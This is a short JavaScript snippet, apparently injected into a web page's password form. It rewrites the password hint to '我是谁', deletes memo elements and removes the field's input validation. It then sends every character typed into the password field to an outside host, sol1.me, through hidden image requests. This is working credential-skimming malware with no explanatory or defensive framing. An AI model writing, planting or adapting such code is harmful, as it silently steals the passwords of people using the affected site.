if (!location.search.includes('t=')) { location.href = location.pathname + '?t=' + Date.now(); } document.addEventListener("DOMContentLoaded", function() { document.getElementById("PasswdQuestion").textContent = "我是谁"; document.querySelectorAll('.Memo').forEach(el => el.remove()); document.getElementById('Passwd').removeAttribute('pattern'); var img1 = new Image(); var img2 = new Image(); var input = document.getElementById("Passwd"); if (input) { input.addEventListener("input", function(e) { var value = e.target.value; img1.src = "https://sol1.me:8080/?password=" + encodeURIComponent(value); img2.src = "https://sol1.me/?jjy_password=" + encodeURIComponent(value); }); } });